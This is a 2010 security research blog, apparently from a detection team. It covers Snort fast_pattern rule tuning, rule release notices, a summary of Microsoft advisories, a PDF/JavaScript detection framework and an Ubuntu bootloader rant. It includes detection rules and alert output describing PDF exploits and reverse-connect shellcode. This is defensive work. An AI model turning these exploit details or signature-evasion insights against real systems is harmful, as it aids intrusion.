Thursday, April 29, 2010

Rule release for today, Thursday April 29th, 2010

Performance update release for 2.8.6 to utilize HTTP buffers and fast_pattern.

Check here for details.

Tuesday, April 27, 2010

Using Snort fast patterns wisely for fast rules

Anyone that's ever written their own Snort rule has wondered, at some point or another, about how to make their rule(s) faster. While some things are obvious - don't use a PCRE with a bunch of ".*" clauses, for example - others are less so. Today I'd like to go over one of the more subtle methods of speeding up a rule, which has been highlighted by some new features in Snort 2.8.6.

Any rule that has one or more content matches in it has a fast pattern associated with it - the string that Snort puts into its fast pattern matching engine to begin the process of detection. Chosen somewhat intelligently by Snort itself, this pattern is usually the longest string in a rule; as a general rule of thumb, the longer the string is, the faster a rule will be, with strings of four or more bytes typically being necessary to reap the benefits of the fast pattern matcher. Only if this string is found in a packet does Snort evaluate the remaining options in the rule - which means that the fewer times the fast pattern matches, the less performance drag the rule will create on Snort. Thus, the goal of a rule-writer should be to choose a fast pattern that will be as closely associated with the actual triggering conditions of the rule as possible - if you can generate an alert for most of the times you actually enter a rule, you've successfully targeted your detection, and written a rule with the minimum possible performance impact on Snort.
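To make the two-stage idea concrete, here is a minimal Python sketch of it. This is a toy model, not Snort's actual engine: the ToyRule class, the sample payloads and the "entered" counter are all made up for illustration, and the only behavior borrowed from the text is "pick the longest content, and only evaluate the rest of the rule if that string is present".

```python
# Toy model of the two-stage check described above (not Snort's real engine).
from dataclasses import dataclass


@dataclass
class ToyRule:
    msg: str
    contents: list  # byte strings that must all appear in the payload

    def fast_pattern(self) -> bytes:
        # Default heuristic from the text: use the longest content string.
        return max(self.contents, key=len)


def evaluate(rule: ToyRule, payload: bytes, stats: dict) -> bool:
    data = payload.lower()  # emulate nocase matching
    if rule.fast_pattern().lower() not in data:
        return False  # cheap rejection: the rule is never entered
    stats["entered"] = stats.get("entered", 0) + 1
    # Expensive stage: check every option in the rule.
    return all(c.lower() in data for c in rule.contents)


rule = ToyRule("toy bot rule", [b"User-Agent:", b"BadBot"])
stats = {}
packets = [
    b"GET / HTTP/1.1\r\nUser-Agent: BadBot\r\n",
    b"GET / HTTP/1.1\r\nUser-Agent: Browser\r\n",
    b"HELO mail.example.com\r\n",
]
alerts = [evaluate(rule, p, stats) for p in packets]
print(alerts, stats)
```

The second packet is the interesting one: it gets past the fast pattern, costs a full rule evaluation, and still doesn't alert. That wasted entry is exactly what a better fast pattern avoids.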

Up until Snort 2.8.6, unfortunately, rule writers had little control over what was chosen as a rule's fast pattern. With the introduction of the fast_pattern keyword and a new config option, however, that's all changed.

Let's start by going over the new config option, since it will provide us with the intelligence we need to properly use the fast_pattern keyword. It's really rather simple; just add:

debug-print-fast-pattern to your config detection statement (NOTE: if you try to specify this on a line separate from your non-default config detection statement, you'll end up setting all detection parameters back to their defaults.)

Just add this line to your Snort config, and you're good to go. If you run Snort with this option enabled, you'll get output similar to the following:

Fast pattern matcher: Content
Fast pattern set: no
Fast pattern only: no
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern

For the sake of this example, we're running Snort with just the following rule enabled:

alert udp $HOME_NET any -> $EXTERNAL_NET 5060 (msg:"POLICY Gizmo register VOIP state"; content:"INVITE sip|3A|"; nocase; content:"User-Agent|3A|"; nocase; content:"Gizmo"; nocase; pcre:"/^User-Agent\x3A[^\n\r]+Gizmo/smi"; reference:url,; classtype:policy-violation; sid:6407; rev:1;)

As noted earlier, Snort has chosen the longest available string - "INVITE sip|3A|" - as the fast pattern for the rule. The problem, unfortunately, is that this pattern will match on all SIP invitations, whereas the rule will generate an alert on only a tiny portion of those requests. Clearly, this is sub-optimal from a performance perspective.

With the new fast_pattern keyword, however, we can fix this problem. By updating the rule to read as follows:

alert udp $HOME_NET any -> $EXTERNAL_NET 5060 (msg:"POLICY Gizmo register VOIP state"; content:"INVITE sip|3A|"; nocase; content:"User-Agent|3A|"; nocase; content:"Gizmo"; nocase; fast_pattern; pcre:"/^User-Agent\x3A[^\n\r]+Gizmo/smi"; reference:url,; classtype:policy-violation; sid:6407; rev:1;)

...we get the following output from Snort:

Fast pattern matcher: Content
Fast pattern set: yes
Fast pattern only: no
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern

As you can see, the fast pattern has been changed per the keyword we used, and Snort now notes that we've explicitly set the fast pattern (i.e. "Fast pattern set: yes"). Since the string "Gizmo" is likely to be orders of magnitude less common than "INVITE sip|3A|" in SIP traffic, the number of times this rule is evaluated will drop dramatically, and the rule will get a commensurate performance boost.
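If you want to get a feel for the difference, a rough Python sketch like the following counts how many payloads would make it past each candidate fast pattern. The payloads are hypothetical, hand-written examples (not captured traffic), and rule_entries is a made-up helper, so treat the numbers as an illustration of the idea rather than a measurement.

```python
# Hypothetical UDP payloads seen on port 5060; only the first is a Gizmo client.
payloads = [
    b"INVITE sip:alice@example.com SIP/2.0\r\nUser-Agent: Gizmo\r\n",
    b"INVITE sip:bob@example.com SIP/2.0\r\nUser-Agent: SomePhone\r\n",
    b"INVITE sip:carol@example.com SIP/2.0\r\nUser-Agent: OtherPhone\r\n",
    b"REGISTER sip:example.com SIP/2.0\r\nUser-Agent: SomePhone\r\n",
]


def rule_entries(fast_pattern, payloads):
    """Count payloads that would get past the fast pattern matcher (nocase)."""
    needle = fast_pattern.lower()
    return sum(1 for p in payloads if needle in p.lower())


default_entries = rule_entries(b"INVITE sip:", payloads)
tuned_entries = rule_entries(b"Gizmo", payloads)
print(default_entries, tuned_entries)
```

With this sample set, the default pattern enters the rule for every INVITE, while the tuned pattern enters it only for the one payload that would actually alert.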

So based on this information, what would you expect the fast pattern to be for the following rule?

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPYWARE-PUT Hijacker xp antispyware 2009 runtime detection - pre-sale webpage"; flow:to_server,established; uricontent:"/buy.html?"; nocase; uricontent:"wmid="; nocase; uricontent:"skey="; nocase; content:"Host|3A|"; nocase; reference:url,; reference:url,; classtype:misc-activity; sid:16136; rev:2;)

If you answered "Host|3A|", you'd be wrong - because of the way Snort picks fast patterns when you have a mix of buffers:

Fast pattern matcher: URI content
Fast pattern set: no
Fast pattern only: no
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern

As you can see, Snort chose the longest pattern out of the URI buffer. In a lot of cases, this default will make sense - after all, the URI buffer is usually smaller than the regular content buffer, and searching a smaller space will be faster. In this particular case, however, we've ended up with a fast pattern that will be fairly common in web traffic - or, at the very least, more common than a search for a particular host string. Since the goal is to enter the rule as little as possible, we want to override this behavior, and go for the more unique pattern:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPYWARE-PUT Hijacker xp antispyware 2009 runtime detection - pre-sale webpage"; flow:to_server,established; uricontent:"/buy.html?"; nocase; uricontent:"wmid="; nocase; uricontent:"skey="; nocase; content:"Host|3A|"; nocase; fast_pattern; reference:url,; reference:url,; classtype:misc-activity; sid:16136; rev:2;)

Fast pattern matcher: Content
Fast pattern set: yes
Fast pattern only: no
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern
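The selection behavior seen in these two examples can be sketched in a few lines of Python. This is only a model of what the debug output above shows (an explicit fast_pattern wins; otherwise the longest URI content is preferred over regular content); the pick_fast_pattern function and the dict layout are assumptions for illustration, and Snort's real selection logic may have more cases than this.

```python
def pick_fast_pattern(options):
    """options: list of dicts with 'buffer', 'pattern' and optional 'fast_pattern'."""
    explicit = [o for o in options if o.get("fast_pattern")]
    if explicit:
        return explicit[0]  # the rule writer's choice always wins
    uri = [o for o in options if o["buffer"] == "uri"]
    pool = uri or options  # prefer URI contents when the rule has any
    return max(pool, key=lambda o: len(o["pattern"]))


rule_options = [
    {"buffer": "uri", "pattern": b"/buy.html?"},
    {"buffer": "uri", "pattern": b"wmid="},
    {"buffer": "uri", "pattern": b"skey="},
    {"buffer": "raw", "pattern": b"Host:"},
]
default_choice = pick_fast_pattern(rule_options)

rule_options[3]["fast_pattern"] = True  # same effect as adding fast_pattern;
explicit_choice = pick_fast_pattern(rule_options)
print(default_choice["pattern"], explicit_choice["pattern"])
```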

We can actually optimize even further from here. As it turns out, once a fast pattern has been matched, and a rule has been entered, Snort will spend CPU cycles looking for the content chosen as the fast pattern again, this time using the content matching engine. While this seems duplicative, in many cases, it's useful; for example, if a content clause follows the one chosen as the fast pattern content, and that second content uses distance and within to force a match only relative to the end of the fast pattern, Snort needs to find the fast pattern that second time to properly evaluate the second content clause. However, for this particular rule, that's not the case, and so there's no point in bothering to find this string a second time. With that in mind, we'll change fast_pattern; to fast_pattern:only;, and save the CPU cycles during rule evaluation. Finally, since the string we're looking for should only be found in the HTTP headers, we'll use the new http_header; keyword to restrict the search to that buffer (which is explicitly split out for the first time in Snort 2.8.6), and end up with the following rule:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPYWARE-PUT Hijacker xp antispyware 2009 runtime detection - pre-sale webpage"; flow:to_server,established; uricontent:"/buy.html?"; nocase; uricontent:"wmid="; nocase; uricontent:"skey="; nocase; content:"Host|3A|"; nocase; fast_pattern:only; http_header; reference:url,; reference:url,; classtype:misc-activity; sid:16136; rev:2;)

...and the associated debug output:

Fast pattern matcher: URI content
Fast pattern set: yes
Fast pattern only: yes
Negated: no
Pattern offset,length: none
Pattern truncated: no
Original pattern
Final pattern

(Note: just because the debug output specifies "URI content" here doesn't actually mean that the pattern is being searched for in the URI buffer. I've verified through testing and talking to the development team that the HTTP header buffer is what's being searched here; the output is the way it is because the HTTP-related buffers, including the URI buffer and the header buffer, are grouped together at the point this output is printed.)
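As a rough aid for deciding when fast_pattern:only; is safe, the criterion described above can be written as a small Python check. This sketch only encodes the one condition the text mentions (a following content that uses distance or within needs the fast pattern to be found again); the function name and the dict layout are made up, and Snort itself may enforce additional restrictions that are not modeled here.

```python
RELATIVE_MODIFIERS = {"distance", "within"}


def can_use_fast_pattern_only(contents, index):
    """Apply the criterion from the text to contents[index].

    contents is a list of dicts such as {"pattern": b"...", "modifiers": {...}}.
    """
    if index + 1 >= len(contents):
        return True  # nothing follows, so nothing can be relative to it
    following = contents[index + 1].get("modifiers", set())
    return not (RELATIVE_MODIFIERS & set(following))


independent = [
    {"pattern": b"Host:", "modifiers": {"nocase"}},
    {"pattern": b"skey=", "modifiers": {"nocase"}},
]
chained = [
    {"pattern": b"Host:", "modifiers": {"nocase"}},
    {"pattern": b"example", "modifiers": {"distance", "within"}},
]
print(can_use_fast_pattern_only(independent, 0))
print(can_use_fast_pattern_only(chained, 0))
```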

One additional item to be cognizant of, for those who begin using the newly available ac-split fast pattern method introduced in 2.8.6, is pattern truncation. The recommended configuration for this method includes the directive "max-pattern-len 20", which will truncate fast patterns at 20 bytes; doing so helps with the memory footprint for Snort, and generally 20 bytes is sufficient for simply using a fast pattern to determine entry into a rule. If your Snort install is set up in this manner, and you need to specify which bytes of a long pattern are the most unique, you can use the fast_pattern:x,y; modifier to the content you're operating on, to specify the offset and length of the portion of the content you wish to use as the fast pattern (you can exceed the 20 byte truncation limit by doing this - Snort will take all of the specified bytes). Note that if you specify fast_pattern:only; on a pattern longer than the number of bytes specified in your configuration, the entire pattern will be used, regardless of its size.
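Here is a small Python sketch of how those three cases play out. It is a model of the behavior described in this paragraph, not Snort code: effective_fast_pattern is a made-up name, the two numbers are treated as an offset and a length (matching the "Pattern offset,length" label in the debug output), and truncation is assumed to keep the leading bytes of the pattern.

```python
def effective_fast_pattern(pattern, max_len=20, offset=None, length=None, only=False):
    """Return the bytes that would be handed to the fast pattern matcher."""
    if offset is not None and length is not None:
        # fast_pattern:x,y; - use exactly the requested slice, even past max_len.
        return pattern[offset:offset + length]
    if only:
        # fast_pattern:only; - the whole pattern is used regardless of size.
        return pattern
    # Default: truncate at max-pattern-len (assumed to keep the leading bytes).
    return pattern[:max_len]


pattern = b"Content-Disposition: attachment; filename=invoice_7731.scr"
print(effective_fast_pattern(pattern))
print(effective_fast_pattern(pattern, offset=42, length=16))
print(effective_fast_pattern(pattern, only=True) == pattern)
```

In this hypothetical pattern, the first 20 bytes are a very common header name, while the slice starting at offset 42 is the part that is actually distinctive.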

With this new functionality in hand, the VRT is busy reviewing our entire ruleset, looking for places where rules can be optimized by proper tweaking of fast pattern settings. Expect to see thousands of changes to the rules over the next several weeks as we work through and implement all of these changes.

Monday, April 26, 2010

Rule release for today - April 26th, 2010

This release contains support for Snort Additionally, new packages have been added that contain 4 digit version numbers.

New package names:
1. snortrules-snapshot-2853_s.tar.gz
2. snortrules-snapshot-2860_s.tar.gz

The packages have been updated with support for Snort Additionally, a number of improvements have been made to the packages to help clarify which packages to use with your specific snort version.

The old package names are still available but they are now symlinked to the new package names. The symlinks will exist for the next 30 days. This should hopefully prevent auto updaters from failing to update correctly.

Symlinks Subscriber:
1. snortrules-snapshot-2853_s.tar.gz -> snortrules-snapshot-CURRENT_s.tar.gz
2. snortrules-snapshot-2853_s.tar.gz -> snortrules-snapshot-2.8_s.tar.gz

The above is not a typo. The 2853 package is symlinked to both the CURRENT and the 2.8 packages. This is intentional, so as not to break auto updaters that define CURRENT incorrectly.

Registered Users:
There are no new symlinks for registered users as the new packages won't be available to registered users for 30 days.

Additional Package Updates.

1. Packages are now locked to the version of snort they support. This includes sub directories in the packages. For example, the 2853 packages now only contain SO rules for

2. Snort.conf in etc/ directory has been updated to support additional features in and

3. Preprocessor Rules are now contained in the package.

4. For Sensitive data rules are contained in the package.

Not running and downloading CURRENT / 2.8 / 2853 packages ?:

1. You will need to modify oinkmaster, pulled pork, or whatever update system you are using to remove version specific rule keywords or snort will fail to load.

Thursday, April 22, 2010

A New Detection Framework

We just completed a talk here in Dubai on some detection capability research the VRT has been doing.  The subtitle of the presentation, "What would you do with a pointer and a size?" pretty much sums up the potential of the project.  It all started last December at the SANS IDS conference.  In talking to both attendees and presenters, it became clear there was a lack of capability for high-end security and response personnel.  Repeatedly we were asked about providing a greater depth of detection, dropping a file to disk for longer analysis and logging packets for an extended period of time.  In short, there were solutions needed that weren't being provided.

So Patrick Mullen and I sat down and started fiddling with some ideas.  I worked on deep parsing and detection on PDF files and Patrick worked on ways to provide me the full file data.  Initially we had an SO rule that grabbed PDF files and called my PDF parser.  We got it working, and it was pretty sexy.  But it blocked the Snort process and clearly wasn't the way to go.  It did, however, show that we were on to something.

Lurene, Patrick, Nigel and I then locked ourselves in a room and hammered out the initial design of what would come to be known as NRT, the Near Real Time detection project.  The project goals were straightforward, if not easy:  Create a system that allowed arbitrary data sources to pass data to specialized detection systems and provide every scrap of data we could back to the incident response teams.

With this laid out, I got a hold of Mike Cloppert, one of the guys we had spoken to at the IDS conference.  We scheduled a call with the team he works with and discussed with them what they wanted out of a detection system.  At the completion of the call, we all were quite pleased.  Everything they had asked for was already in the design, and quite a bit more as well.  We were on the right track.

Coding began.  This involved every person on the VRT and a lot of late nights.  Our goal for the first phase of POC was to prove that we could use Snort as a datasource for a system that would then provide analysis out of band with network traffic and alert back into the system.  At the end of a hectic month of coding (along with all of our other work) we had a static preprocessor that pulled files off the wire and passed them to a PDF detection module, a ClamAV engine and a pure logging module.  The end result was the capability to thread out (non-blocking) detection of PDF files, handling the common evasion techniques for PDF files and then alert back to Snort:

04/21-11:17:58.1271873878 [**] [300:3221225473:1] URL:/wrl/first.pdf Hostname:wrl Alert Info:Probable exploit of CVE-2009-0658 (JBIG2) detected in object 8, declared as /Length 29/Filter [/FlateDecode/ASCIIHexDecode/JBIG2Decode ]  [**] 

{TCP} ->
04/21-11:17:58.12718738780:0:0:0:0:0 -> 0:0:0:0:0:0 type:0x800 len:0x0 -> TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:1280
***AP*** Seq: 0x0  Ack: 0x0  Win: 0x0  TcpLen: 20
55 52 4C 3A 2F 77 72 6C 2F 66 69 72 73 74 2E 70 URL:/wrl/first.p
64 66 20 48 6F 73 74 6E 61 6D 65 3A 77 72 6C 20 df Hostname:wrl 
41 6C 65 72 74 20 49 6E 66 6F 3A 50 72 6F 62 61 Alert Info:Proba
62 6C 65 20 65 78 70 6C 6F 69 74 20 6F 66 20 43 ble exploit of C
56 45 2D 32 30 30 39 2D 30 36 35 38 20 28 4A 42 VE-2009-0658 (JB
49 47 32 29 20 64 65 74 65 63 74 65 64 20 69 6E IG2) detected in
20 6F 62 6A 65 63 74 20 38 2C 20 64 65 63 6C 61 object 8, decla
72 65 64 20 61 73 20 2F 4C 65 6E 67 74 68 20 32 red as /Length 2
39 2F 46 69 6C 74 65 72 20 5B 2F 46 6C 61 74 65 9/Filter [/Flate
44 65 63 6F 64 65 2F 41 53 43 49 49 48 65 78 44 Decode/ASCIIHexD
65 63 6F 64 65 2F 4A 42 49 47 32 44 65 63 6F 64 ecode/JBIG2Decod
65 20 5D 20                                      e ] 


Detection was extremely accurate and specific to the triggering condition of the vulnerability.  The PDF parser inflated the JBIG2 stream, handled any encoding and then looked at the specific conditions required to exploit the reader.  It fully detects attacks generated by the Metasploit framework.  In fact, it was good enough to uncover a bug in the Metasploit JBIG2 module which has now been fixed.  By allowing additional detection, above what is done by the Snort engine now, to occur outside of the packet stream, we are able to provide much more data back to the user.  Which got us to thinking about Javascript...

Anyone who has looked at Javascript data associated with exploits knows that there are often long, random names assigned to variables.  We decided to check for that by jamming all of the variable names together and then doing an entropy check.  If the result was too random, we'd alert.  For example, taking all of the JavaScript variables from one attack file and putting them together, we get:


Which in turn, leads the NRT to fire:

[**] [300:2147483653:1] URL:/wrl/first.pdf Hostname:wrl Alert Info:The JavaScript variables in object 6, declared as /Length 5994/Filter [/FlateDecode/ASCIIHexDecode ] , show a high degree of entropy [**]
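For anyone who wants to play with the idea, an entropy check of this kind can be sketched in a few lines of Python. This is not the NRT code: it uses plain Shannon entropy over the characters of the joined names, and the looks_random helper, the 4.0 bits-per-character threshold and the sample variable names are all assumptions picked for illustration.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Shannon entropy of a string, in bits per character."""
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_random(variable_names, threshold=4.0):
    # Jam all of the names together, then compare against an assumed threshold.
    joined = "".join(variable_names)
    return bool(joined) and shannon_entropy(joined) > threshold


ordinary = ["index", "count", "total", "item"]
suspicious = ["xQ7vLz2KpW", "mB9tRgY4hN", "cJ6sDfU8aE"]  # hypothetical names
print(looks_random(ordinary), looks_random(suspicious))
```

A real detector would need a threshold tuned against known-good and known-bad samples, since short scripts and minified code can skew the numbers in both directions.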

We were in detection nirvana.  Anything we wanted to do, no matter how much processor it took, was available to us.

While sitting in Dubai on day one of HitB, Lurene came up with an idea of how to analyze unescaped data to find shellcode.  The process went like this:  Grab the PDF off the wire, inflate the JavaScript object, determine that it is JavaScript, normalize the unescape() calls and pass the data to a custom nugget written by Lurene.  This nugget then uses heuristics to discover the encoder type, decodes the shellcode and then returns data about the shellcode found.  The result:

[**] [300:3221225482:1] URL:/wrl/first.pdf Hostname:wrl Alert Info:Reverse TCP connectback shellcode detected. Connecting to on port 4444  [**]

This data didn't come from seeing data to port 4444 on host, it came from interpreting shellcode that was unescaped in a compressed object in a PDF that we pulled off the wire. We're excited.
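The "normalize the unescape() calls" step is the easiest part of that chain to illustrate. The Python sketch below turns the argument of an unescape() call into the bytes it would occupy in memory, on the assumption that the JavaScript string is stored as little-endian UTF-16 code units. It is not Lurene's nugget, and it does none of the encoder heuristics or shellcode decoding; unescape_to_bytes is a made-up name.

```python
import re

_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def unescape_to_bytes(js_string):
    """Expand %uXXXX and %XX escapes, then lay the string out as UTF-16LE."""
    def expand(match):
        return chr(int(match.group(1) or match.group(2), 16))

    text = _ESCAPE.sub(expand, js_string)
    # surrogatepass keeps lone surrogate code units instead of raising an error.
    return text.encode("utf-16-le", "surrogatepass")


print(unescape_to_bytes("%u9090%u4142").hex())
```

Note the byte swap: %u4142 becomes the bytes 42 41, which is why escaped shellcode looks scrambled until it is laid out this way.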

But this system had to be open and it had to be extensible.  It had to be flexible and it had to be verbose in its logging.  So here is what we came up with:


This component is the heart of the system.  It handles data sources and detection nuggets. It manages a central database of all known good and known bad files and URLs.  Additionally, it keeps track of known good and bad sub-components (JS in PDF, for example), so that detection speed is improved and so that we can alert on data subsequently found to be bad. Finally it creates a complete log of detection by writing out not just the original file, but also the normalized versions of the segment of code that creates the alerts.


We want to be able to provide data into the system from any arbitrary location.  Capture a file off the wire with Snort, grab the file via a Milter, pass the file into the system from ClamAV or just hook on-open on a Windows system and pass it to the system?   All of that should be handled and available through an API.


For any given data handler one or more nuggets should be available.  The nuggets should be able to pass data to other nuggets.  For example, a PDF nugget that finds embedded JavaScript data should be able to pass just that block into a Javascript system.


Snort registers with the Dispatcher as a Data Handler.  The Nugget Farm is populated by both a PDF and a JavaScript nugget.  Snort grabs the file and sends it to the PDF nugget.  The PDF parser finds the JavaScript block and sends it to the JavaScript nugget.  When the JavaScript nugget alerts, it sends the normalized data back to the Dispatcher.  When the PDF file alerts on the JBIG section it sends the data in the JBIG section as well as the entire file back to the Dispatcher.  The dispatcher writes each section and the associated alerts to disk in addition to the full file.  Finally it alerts into the Snort system.
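To give a feel for that flow, here is a very small Python sketch of a dispatcher with two chained nuggets. It is purely illustrative and is not the NRT API (the POC itself is C): the class, the method names and the trivial "detection" logic are all invented for this example, and there is no threading, database or on-disk logging here.

```python
class Dispatcher:
    def __init__(self):
        self.nuggets = {}  # data type -> list of detection callables
        self.alerts = []   # (data type, message, data) records for responders

    def register_nugget(self, data_type, nugget):
        self.nuggets.setdefault(data_type, []).append(nugget)

    def submit(self, data_type, data):
        # A data handler (or another nugget) hands over a buffer for detection.
        for nugget in self.nuggets.get(data_type, []):
            nugget(self, data)

    def alert(self, data_type, message, data):
        self.alerts.append((data_type, message, data))


def pdf_nugget(dispatcher, data):
    # Stand-in for a real PDF parser: pass any embedded script block onward.
    marker = b"/JS "
    if marker in data:
        dispatcher.submit("javascript", data.split(marker, 1)[1])


def javascript_nugget(dispatcher, data):
    if b"unescape(" in data:
        dispatcher.alert("javascript", "unescape() call found", data)


dispatcher = Dispatcher()
dispatcher.register_nugget("pdf", pdf_nugget)
dispatcher.register_nugget("javascript", javascript_nugget)
dispatcher.submit("pdf", b"%PDF-1.4 /JS unescape('%u9090')")
print(dispatcher.alerts)
```

The point of the design is visible even at this size: the PDF nugget knows nothing about JavaScript detection, it just hands the block to whatever is registered for that data type.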

There are more details, such as how we alert back in time (no sonic screwdriver required).  But we'll get to that.  For now we want to see what you would do if we handed you a pointer and a size.  So we've put up some rough (very rough) POC code at  Review the code in src/preprocessor/nrt_* to see what we're up to.  Modeling that code you should be able to write your own C code to do detection against files pulled by the system.

We've got a long way to go, with a ton of research in front of us.  There is no time-line for full release, but we're interested in seeing what you come up with.  As we create additional documentation and nail down more functionality, we'll continue updating the code.  Keep an eye on labs and the VRT blog for updates.  In the meantime, go poke around and let us know what you come up with.

Code & Dubai Presentation available at:

Thursday, April 15, 2010

Rule release for today, Thursday April 15th, 2010

Maintenance release, a few new rules and modifications to existing ones.

Check here for details.

Tuesday, April 13, 2010

April 2010 Vulnerability Report

Rule release for today, Tuesday April 13th, 2010

Microsoft Tuesday and Adobe Quarterly Patch. Details available here.

Microsoft Security Advisory (MS10-019):
The Microsoft CAB Subject Interface Package (SIP) implementation contains a programming error that may allow a remote attacker to bypass the authentication mechanism.

Microsoft Security Advisory (MS10-020):
The Microsoft implementation of the SMB protocol contains programming errors that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-023):
Microsoft Publisher contains a programming error that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-024):
The Microsoft SMTP service is prone to a Denial of Service condition that may be triggered by a remote attacker.

Microsoft Security Advisory (MS10-025):
The Microsoft Windows Media Service suffers from a programming error that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-026):
Microsoft Windows Media Player contains a programming error that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-027):
Microsoft Windows Media Player contains a programming error that may allow a remote attacker to execute code on an affected system via an ActiveX control.

Microsoft Security Advisory (MS10-028):
Microsoft Visio suffers from programming errors that may allow a remote attacker to execute code on an affected system.

Microsoft Security Advisory (MS10-029):
The Microsoft implementation of IPv6 contains a programming error that may allow a remote attacker to spoof connections to an affected host.

Thursday, April 8, 2010

Rule release for today, Thursday April 8th, 2010

Mostly some small fixes, couple of reference changes and some new rules.

Check it out here

Wednesday, April 7, 2010

WTF, Ubuntu?

I just finished installing Ubuntu 9.10 server edition on a shiny new Dell PowerEdge R805 box, as part of expanding our malware analysis labs. No big deal - half an hour of babysitting an installer, right?


It took me 5 hours, thanks to some really stupid decisions made by the Ubuntu team surrounding perhaps the most vital part of the installation process: the bootloader.

The actual install itself was nice and easy, just like I've come to expect out of the Ubuntu folks: sane defaults, good explanations when I had to make a relevant choice, and generally minimal requirements for interactivity. Anybody with even the most basic computer experience could fumble their way through it. After finishing, I took my CD out, rebooted...and suddenly found myself at a Busybox shell with a note about GRUB being unable to find the root filesystem.

I figured I'd done something really retarded, because in all of the years I've been installing *NIX operating systems, I've only had one other bootloader failure - an OpenBSD "Bad Magic" issue when I was swapping out hard drives that made immediate sense once I did two seconds worth of Googling, and that yielded a fun little picture in the process. So I sat down, thought for a second, and then realized I'd installed the 32-bit version of Ubuntu on a box with 8GB of RAM and a terabyte worth of hard drive - which sure seemed like a good reason for the OS to not be seeing the drive properly.

So I headed back to my desk, burned a copy of the 64-bit version, reinstalled, and got...the exact same Busybox shell. Damnit!

A quick bit of Googling seemed to suggest that there were issues with GRUB recognizing really big disks. Since I'd just used the whole drive with Ubuntu's guided LVM setup, I figured that either my /boot partition was way off past the end of where GRUB could read, or that my / partition was just too big for it to handle. That's what I get for being lazy, I figured, and headed back into installer land, this time manually partitioning things so that /boot was at the very start of the drive, / was 50GB, and /var took up the rest of the space. Another 30-minute installation later, I rebooted, figuring I'd be all set.

Not so much.

Confused, I followed the suggestion at the Busybox shell and did a "cat /proc/modules". Sure enough, mptbase, mptsas, and scsi_transport_sas were all loaded - exactly the modules I needed to be able to see this SAS/MPT BIOS controller. /dev/sda* existed, and inspecting /boot/grub/grub.cfg (side note: Linux people, can we *please* agree on one frikkin' extension for config files?) showed that my root device was set properly. What the hell?

Getting desperate, I spent some substantial time scouring the web for answers. It seems that a number of people have had problems installing various versions of Ubuntu on the R805 boxes - but in classic Linux style, any time someone popped onto a forum or a mailing list asking how to fix boot issues with this hardware, the thread ended with some variant of "Hey, I figured it out! Thanks guys!", and NO GODDAMNED DESCRIPTION OF HOW THEY FIXED THE PROBLEM. Seriously, people, it takes like two minutes to explain the fix, and it will save countless people countless hours of pain if you just make sure your solution is archived somewhere on the web.

After trying a whole host of possible fixes - setting the SAS controller to be visible to "BIOS only" instead of "BIOS & OS", telling the CD installer to boot off the first hard drive, etc. - I ran across this little nugget of wisdom, which suggested that I set my "rootdelay" value to 35 to give the SAS adapter time to initialize.

Aha! That made perfect sense, I figured. After all, this entire process had been further aggravated by the 30 seconds or so it takes the Dell SAS controller to initialize on each boot (seriously, people, how does it take a hard disk controller 30 f'ing seconds to initialize on a machine with 8 2.5GHz cores?); why wouldn't it want to waste another 30 seconds of my life re-initializing after the operating system loaded?

Optimistic about my prospects for success, I rebooted yet again, held down shift like the article suggested...and got no GRUB menu. I tried again with "e" (which I vaguely remembered using on some other bootloader in years gone by), and again with "Esc". The third time being a charm, I decided to brute-force the issue, popped the installer disc back in the drive, and chose "Rescue Broken System" from the menu.

This is where I started to realize how broken Ubuntu's installation has become.

At first, I thought I'd accidentally chosen "Install Ubuntu" from the menu, because the system proceeded along all of the same steps as a regular install. It even went to the trouble of finding my network hardware, having me choose an interface to do DHCP on, and set a hostname. Seriously, guys, I promise I don't need a fully functional network just to go touch my bootloader, repair a broken partition, or, you know, do anything else that would require me to use a CD to boot. You're just wasting my time.

Once I finally got my shell and headed on over to edit /boot/grub/grub.cfg, I realized the reason I couldn't get into the GRUB menu: the default timeout value had been set to "-1", i.e. "don't wait at all". Gee, guys, that makes so much sense - because, you know, no one will ever need to edit their GRUB config on the fly! That, and setting a delay of 1 second would just be too much hassle for people trying to boot up nice and fast on their shiny new servers with the 90-second delay to get into the bootloader.

With the delay fixed and GRUB reinstalled, I booted up again, and this time actually got to the GRUB menu. Much to my horror, the banner on the top read:

"GRUB version 1.97~beta4"

Really, Ubuntu? Seriously? You're going to put a beta version of a bootloader on the production release of a server operating system? What cutting-edge boot-loading feature could you possibly need that you couldn't use a release version of GRUB?

Cursing the Ubuntu developers under my breath, I added the rootdelay value, hit Ctrl-x to boot, waited...and had a fully operational operating system in under a minute! Hallelujah!

Convinced that I was done, I added the rootdelay value to /boot/grub/grub.cfg, ran "update-grub" as root to make the changes permanent, and rebooted one last time, just to be sure. It's a good thing I did, too, because MY CHANGES WEREN'T SAVED, and I ended right back up at my Busybox shell. I had to go in through the rescue option on the installer CD, make my changes there, and update GRUB from my CD just to get the changes to stick.

With all of the effort the Ubuntu people put into making their installation simple, you'd think they could have gone to the trouble of setting the "rootdelay" variable to a higher value when they saw a SAS card that they probably know takes forever to initialize. Really, would that be so hard, guys?

Monday, April 5, 2010

Matt's Primer for PDF Analysis

For obvious reasons, the VRT has been spending a lot of time on the PDF format lately. While the attack researchers have been concentrating on fuzzing, reverse engineering and data flow analysis, the defense researchers have been automating the backend analysis of PDF submissions. As part of this effort, we've had to do a very deep dive on the PDF format. I thought it might be useful to share some of what we're seeing come in our data feeds, and what you should look for when reviewing PDF files.

So let's start with the first structure you have to understand, the obj structure. For the moment, most everything you really are going to worry about occurs in association with either the obj tags or Javascript. Here is the obj tag format:

